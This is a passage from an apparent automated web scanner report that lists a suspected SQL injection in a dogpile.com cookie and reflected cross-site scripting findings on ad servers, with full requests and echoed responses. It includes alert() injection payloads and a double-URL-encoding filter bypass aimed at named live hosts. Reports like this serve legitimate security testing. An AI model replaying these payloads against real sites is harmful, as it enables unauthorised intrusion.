Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a8aa3c67a6df4df58725c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:35 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:34 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

1.4. http://www.dogpile.com/dogpile_other/ws/index [wsViewRecent cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The wsViewRecent cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the wsViewRecent cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1%2527; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=4007b90f8c664cd98297c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:11 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
=true"); }
.addSearchProvider { background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_cloud.gif/_iceUrlFlag=15?_IceUrl=true"); }
.tellFriendError{background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/error_icn.gif/_iceUrlFlag=15?_IceUrl=true");}
.tellFriendSuccess{background-image:url("http://ttl60m.dp
...[SNIP]...

Request 2

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1%2527%2527; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=3772e0b16dad447aa616c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:07 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:07 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:06 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

2. Cross-site scripting (reflected)
There are 163 instances of this issue:


2.1. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7384'-alert(1)-'7c333334a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtappc7384'-alert(1)-'7c333334a54/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 484
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtappc7384'-alert(1)-'7c333334a54/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.2. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb9e1'-alert(1)-'613b7c7ac4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/generalbb9e1'-alert(1)-'613b7c7ac4f;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 484
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:12 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/generalbb9e1'-alert(1)-'613b7c7ac4f;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.3. http://a.collective-media.net/adj/ns.androidtapp/general [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 347a8'-alert(1)-'d4c2fe2cbc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277?&347a8'-alert(1)-'d4c2fe2cbc9=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 488
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277?&347a8'-alert(1)-'d4c2fe2cbc9=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.4. http://a.collective-media.net/adj/ns.androidtapp/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidtapp/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 325d1'-alert(1)-'e054d2cf3d2 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277?325d1'-alert(1)-'e054d2cf3d2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 485
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:11 GMT
Connection: close
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=4522430587094277?325d1'-alert(1)-'e054d2cf3d2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.5. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1234'-alert(1)-'50d2c8c77f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadjb1234'-alert(1)-'50d2c8c77f2/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7684
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-71818458_1301681756","http://ad.doubleclick.net/adjb1234'-alert(1)-'50d2c8c77f2/ns.androidtapp/general;net=ns;u=,ns-71818458_1301681756,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43
...[SNIP]...

2.6. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7527'-alert(1)-'fdf3b6f66b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtappd7527'-alert(1)-'fdf3b6f66b/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:57 GMT
Content-Length: 7683
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-36871899_1301681757","http://ad.doubleclick.net/adj/ns.androidtappd7527'-alert(1)-'fdf3b6f66b/general;net=ns;u=,ns-36871899_1301681757,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex
...[SNIP]...

2.7. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2e22'-alert(1)-'3e8eb7d654d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtapp/generale2e22'-alert(1)-'3e8eb7d654d;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7684
Date: Fri, 01 Apr 2011 18:15:57 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-51986405_1301681757","http://ad.doubleclick.net/adj/ns.androidtapp/generale2e22'-alert(1)-'3e8eb7d654d;net=ns;u=,ns-51986405_1301681757,11e4f07c0988ac7,Miscellaneous,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex.11-ex.6
...[SNIP]...

2.8. http://a.collective-media.net/cmadj/ns.androidtapp/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d22'-alert(1)-'cdf5b1c5e11 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/ns.androidtapp/general;ppos=10d22'-alert(1)-'cdf5b1c5e11 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7576
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
=ns;u=,ns-41308500_1301681756,11e4f07c0988ac7,none,dx.13-dx.4-dx.1-dx.2-dx.6-dx.12-dx.15-dx.22-dx.26-dx.28-dx.30-dx.31-dx.34-dx.36-dx.5-dx.ch-dx.bi-dx.24-dx.42-dx.43-dx.41-dx.40-ex.11-ex.6-bk.jb;;ppos=10d22'-alert(1)-'cdf5b1c5e11;contx=none;dc=w;btg=dx.13;btg=dx.4;btg=dx.1;btg=dx.2;btg=dx.6;btg=dx.12;btg=dx.15;btg=dx.22;btg=dx.26;btg=dx.28;btg=dx.30;btg=dx.31;btg=dx.34;btg=dx.36;btg=dx.5;btg=dx.ch;btg=dx.bi;btg=dx.24;btg=dx.42
...[SNIP]...

2.9. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 4b45f<script>alert(1)</script>40dfedbedff was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_2896694b45f<script>alert(1)</script>40dfedbedff HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
